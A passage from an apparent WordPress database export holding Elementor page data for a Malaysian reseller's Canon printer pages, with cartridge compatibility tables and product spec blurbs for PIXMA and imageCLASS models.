width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6896,3298,'_elementor_version','2.5.14'),(6901,3299,'_elementor_template_type','post'),(6902,3299,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 